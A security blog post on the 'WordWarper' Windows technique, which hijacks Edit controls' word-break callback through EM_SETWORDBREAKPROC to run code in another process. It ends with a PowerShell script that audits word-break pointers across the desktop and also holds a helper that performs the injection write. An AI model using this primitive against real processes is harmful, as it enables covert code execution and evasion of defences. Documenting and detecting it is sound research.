WordWarper – (not a) new code injection trick


The Internet is a cool place, because luckily there are some good souls who point us in the right direction. The technique I describe below was presented as early as July 2003 by Oliver Lavery from iDefense! Thanks to modexp for pointing it out.

Old Post

This is a trivial case of yet another piece of functionality that can help to execute code in a remote process. As with the PROPagate technique, it only affects selected windows, but it can of course be used for evasion, especially in the early stages of a compromise.

Edit controls (including Rich Edit) are very common Windows controls, present in most applications, either embedded directly or as subclassed windows. When they display text in multiline mode they use a so-called EditWordBreakProc callback function: any time the control needs to do something related to word wrapping (for example, to find where a line may be broken while the user types), it calls this procedure.

One can replace this function for any window by sending it the EM_SETWORDBREAKPROC message, with the address of the new procedure in lParam. If the window is an Edit control or one of its descendants, funny things may happen: the control simply stores the pointer and calls it, inside the target process, the next time it has to wrap text. Note that the address is interpreted in the target's address space, so for real injection the code (or some useful existing function) has to be there already; a bogus address just crashes the control, which is exactly what the demo that follows relies on.

To see which windows are susceptible to such modification I created a simple demo program that sends this message to every window on my desktop.

After looking around and running some potential victim programs I quickly found a good candidate to demo the technique: Sticky Notes (StikyNot).

I ran it under a debugger to catch the moment it crashed, and then ran my test program, which changed the word-break procedure of every window to 0x12345678.

And this is what happens when you start typing in Sticky Notes after the procedure has been changed:

I bet there are more programs that can be targeted this way, but as usual, I leave it as homework to the reader :-)
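To help with that homework, here is an added example (my own code, not part of the original post or of the POCs linked below) that reproduces the enumeration side of the demo from PowerShell and adds the check a defender would want: it walks every top-level and child window on the desktop, asks each one for its application-defined word-break procedure with EM_GETWORDBREAKPROC, and for every non-zero answer tests whether that address falls inside a loaded module of the owning process; a pointer into anonymous memory is the signature of exactly this kind of injection. A second helper performs the EM_SETWORDBREAKPROC write described above against a single window you choose. Function names (Get-WordBreakProcReport, Set-WordBreakProc and the helpers), the WordWarper.Native P/Invoke class, and the 200 ms message timeout are my choices; the message numbers and flags are the documented Win32 constants. It assumes Windows PowerShell 5.1 or PowerShell 7 running in the same desktop session as the targets.

```powershell
# Added example (not from the original post): audit and set EditWordBreakProc pointers.
# P/Invoke surface: only user32 calls that exist with these signatures.
Add-Type -Namespace WordWarper -Name Native -MemberDefinition @'
public delegate bool EnumWindowsProc(System.IntPtr hWnd, System.IntPtr lParam);
[DllImport("user32.dll")] public static extern bool EnumWindows(EnumWindowsProc cb, System.IntPtr lParam);
[DllImport("user32.dll")] public static extern bool EnumChildWindows(System.IntPtr parent, EnumWindowsProc cb, System.IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Unicode)] public static extern int GetClassName(System.IntPtr hWnd, System.Text.StringBuilder buf, int max);
[DllImport("user32.dll")] public static extern uint GetWindowThreadProcessId(System.IntPtr hWnd, out uint pid);
[DllImport("user32.dll", SetLastError = true)] public static extern System.IntPtr SendMessageTimeout(System.IntPtr hWnd, uint msg, System.IntPtr wParam, System.IntPtr lParam, uint flags, uint timeout, out System.IntPtr result);
'@

$EM_SETWORDBREAKPROC = 0x00D0   # lParam = address of the new EditWordBreakProc
$EM_GETWORDBREAKPROC = 0x00D1   # returns that address, or 0 if none was ever set
$SMTO_ABORTIFHUNG    = 0x0002   # do not block on a window whose thread is hung

function Get-AllWindowHandles {
    # Top-level windows plus all their descendants (edit controls are almost always children).
    $handles = [System.Collections.Generic.List[IntPtr]]::new()
    $cb = [WordWarper.Native+EnumWindowsProc]{ param([IntPtr]$h, [IntPtr]$l) $handles.Add($h); $true }.GetNewClosure()
    [WordWarper.Native]::EnumWindows($cb, [IntPtr]::Zero) | Out-Null
    foreach ($top in @($handles)) {   # iterate over a snapshot; the callback appends to $handles
        [WordWarper.Native]::EnumChildWindows($top, $cb, [IntPtr]::Zero) | Out-Null
    }
    return $handles
}

function Get-WindowClass([IntPtr]$Hwnd) {
    $sb = [System.Text.StringBuilder]::new(256)
    [WordWarper.Native]::GetClassName($Hwnd, $sb, $sb.Capacity) | Out-Null
    return $sb.ToString()
}

function Get-WordBreakProc([IntPtr]$Hwnd) {
    # Address the control reports, 0 when no app-defined proc is installed, $null if it did not answer.
    $result = [IntPtr]::Zero
    $ok = [WordWarper.Native]::SendMessageTimeout($Hwnd, $EM_GETWORDBREAKPROC, [IntPtr]::Zero, [IntPtr]::Zero,
                                                  $SMTO_ABORTIFHUNG, 200, [ref]$result)
    if ($ok -eq [IntPtr]::Zero) { return $null }
    return $result.ToInt64()
}

function Test-AddressInModule([uint32]$ProcessId, [long]$Address) {
    # Module name containing $Address, '' if it lies outside every image (suspicious),
    # $null if the module list cannot be read (access denied, protected process, other bitness).
    try { $mods = (Get-Process -Id $ProcessId -ErrorAction Stop).Modules } catch { return $null }
    foreach ($m in $mods) {
        $base = $m.BaseAddress.ToInt64()
        if ($Address -ge $base -and $Address -lt ($base + $m.ModuleMemorySize)) { return $m.ModuleName }
    }
    return ''
}

function Get-WordBreakProcReport {
    # One record per window that carries a non-default word-break procedure.
    foreach ($h in Get-AllWindowHandles) {
        $addr = Get-WordBreakProc $h
        if (-not $addr) { continue }                       # $null (no answer) or 0 (default)
        $ownerPid = [uint32]0
        [WordWarper.Native]::GetWindowThreadProcessId($h, [ref]$ownerPid) | Out-Null
        $module  = Test-AddressInModule -ProcessId $ownerPid -Address $addr
        $verdict = if ($null -eq $module) { 'unknown (cannot read modules)' }
                   elseif ($module)       { "in image $module" }
                   else                   { 'SUSPICIOUS: outside every loaded module' }
        [pscustomobject]@{
            Hwnd    = '0x{0:X}' -f $h.ToInt64()
            Class   = Get-WindowClass $h
            Pid     = $ownerPid
            Proc    = '0x{0:X}' -f $addr
            Verdict = $verdict
        }
    }
}

function Set-WordBreakProc([IntPtr]$Hwnd, [long]$Address) {
    # The post's experiment: hand one control an arbitrary pointer. With code already present in the
    # target this is the injection primitive; with a bogus value such as 0x12345678 the target crashes
    # the next time it has to wrap text, so aim it at a single disposable test window, never at all of them.
    $result = [IntPtr]::Zero
    $ok = [WordWarper.Native]::SendMessageTimeout($Hwnd, $EM_SETWORDBREAKPROC, [IntPtr]::Zero, [IntPtr]$Address,
                                                  $SMTO_ABORTIFHUNG, 200, [ref]$result)
    return ($ok -ne [IntPtr]::Zero)
}

# Usage: audit the desktop, then (optionally) poke one window you own.
Get-WordBreakProcReport | Format-Table -AutoSize
# Set-WordBreakProc -Hwnd ([IntPtr]0x00010ABC) -Address 0x12345678   # replace with a real test HWND
```

A few practical caveats. A non-zero pointer that lands inside the owning process's own image is normal (the application installed its own callback), so a baseline of which programs legitimately do this keeps the report quiet; only a pointer into memory that no module owns deserves a second look, and even then the check is point-in-time, so run it before and after the behaviour you want to observe. Messages sent to a window of higher integrity level are dropped by UIPI, which is why both helpers report failure rather than silently pretending the write landed. Finally, the pointer is written at the sender's width: a 64-bit script sending to a 32-bit target will have the high bits discarded, so pick the PowerShell bitness to match the victim when you test.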

Modexp shared a nice POC here.
Csaba shared a nice POC here.